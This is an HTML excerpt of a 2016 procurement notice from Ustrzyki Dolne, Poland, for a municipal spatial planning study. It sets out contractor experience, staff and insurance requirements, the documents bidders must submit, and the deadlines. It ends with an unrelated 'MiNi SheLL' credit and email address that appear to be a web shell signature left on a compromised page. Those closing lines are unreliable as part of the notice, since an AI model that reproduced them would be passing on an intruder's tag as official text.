<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum 2 studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy lub ich zmiany, lub 10 miejscowych planów zagospodarowania przestrzennego lub ich zmiany, każde z nich obejmujące obszar o powierzchni nie mniejszej niż 10 km2, sporządzone na podstawie przepisów ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym, które zostały uchwalone i w stosunku do których nie zostały wydane rozstrzygnięcia nadzorcze.
Dowodami, o których mowa powyżej są:
a)	poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane przed upływem terminu składania ofert;
b)	 w przypadku zamówień na usługi - oświadczenie Wykonawcy - jeżeli 
z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest 
w stanie uzyskać poświadczenia, o którym mowa w pkt a).
Jeżeli Wykonawca przedstawi mniej usług określonych powyżej, bądź którakolwiek 
z przedstawionych usług dotyczy obszaru o powierzchni mniejszej niż 10km2 lub jeżeli chociaż do jednej z nich zostało wydane rozstrzygnięcie nadzorcze będzie to uznane przez Zamawiającego jako nie wywiązanie się ze swych dotychczasowych zobowiązań w stopniu, który podważa posiadanie poziomu kwalifikacji, kompetencji
i rzetelności wymaganego dla należytego wywiązywania się z zobowiązań przy realizacji udzielanego zamówienia.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane 
w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przekładania dowodów o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia specjalnych warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni powyższy warunek w sytuacji, gdy wykaże, że dysponuje:
Głównym projektantem min. jedną osobą
spełniającą wymogi określone w art. 5 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym Dz. U z 2016 r. poz. 788, posiadającą niezbędną wiedzę i doświadczenie do wykonania zamówienia
która w okresie ostatnich sześciu lat wykonała minimum 2 studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy lub ich zmiany, lub 10 miejscowych planów zagospodarowania przestrzennego lub ich zmiany, każde z nich obejmujące obszar o powierzchni nie mniejszej niż 10 km2, sporządzone na podstawie przepisów ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym, które zostały uchwalone i w stosunku do których nie zostały wydane rozstrzygnięcia nadzorcze,przynajmniej jeden z dokumentów, o którym mowa powyżej odnosi się do terenu lub terenów na których występował przynajmniej jeden park krajobrazowy lub obszar chronionego krajobrazu, będący formą ochrony przyrody, o której mowa  w art. 6 ust. 1 pkt 3 lub 4 ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody Dz. U. z 2015 r., poz. 1651, z późn. zm.zm.
Zamawiający dopuszcza także kwalifikacje, zd obyte w innych państwach 
i odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, w zakresie którego właściwy organ wydaje decyzję w sprawie uznania kwalifikacji zawodowych na zasadach określonych w ustawie z dnia 
22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych 
w państwach członkowskich Unii Europejskiej Dz. U. z 2015r. poz. 65. 
Zamawiający określił minimalnych wymagań dotyczących dysponowania personelem. Wykonawca powinien zapewnić odpowiednią ilość personelu zapewniającą terminowe wykonanie zamówienia, w tym osoby mogące zastąpić powyżej wymienionych w przypadku absencji pracowniczej.
Zamawiający będzie oceniał spełnianie przez Wykonawcę ww. warunku poprzez szczegółową weryfikację wykazu personelu w zakresie kwalifikacji osób oraz ilości osób w nim wskazanych w szczególności co do zgodności z wymienionym 
w powyższym warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że posiada opłaconą polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia o wartości nie mniejszej niż 100.000 zł obejmujące swoim zakres odpowiedzialność za produkt i wykonaną usługę, a także odpowiedzialność w stosunku do osób trzecich.
1Oferty wspólne przedstawione przez Wykonawców składające się z dwóch lub więcej przedsiębiorstw jako partnerów, będą musiały spełniać następujące wymagania
	oferta będzie zawierać informacje wymienione w punkcie 2
	oferta będzie podpisana w taki sposób, by wiązała prawnie wszystkich partnerów
c)	wszyscy partnerzy będą ponosić odpowiedzialność solidarną za wykonanie umowy zgodnie z jej postanowienia
	jeden z partnerów konsorcjum zostanie wyznaczony jako partner kierujący lider, upoważniony do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów
	zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy 
w całości przez partnera kierującego lub od wszystkich partnerów łącznie lub od każdego z osobna, albo też w inny sposób ustalony w umowie konsorcjum.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony formularz oferty stworzony wg załączonego wzoru,
2)	Podpisany przez Wykonawcę  projekt umowy,
3)	Dowód wniesienia wadium.
4)	Informacja - wskazanie przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy  podwykonawcom</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin wykonanie studium - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień umowy w przypadkach określonych 
w projekcie umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ustrzyki-dolne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Urzędzie Miejskim
w Ustrzykach Dolnych, pokój nr 12, ul. Mikołaja Kopernika 1, 38-700 Ustrzyki Dolne d.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2016 godzina 09:30, miejsce: w Urzędzie Miejskim
w Ustrzykach Dolnych, I piętro, pokój nr 26 (sekretariat), ul. Mikołaja Kopernika 1, 38-700 Ustrzyki Dolne d.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia finansowany ze środków Gminy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com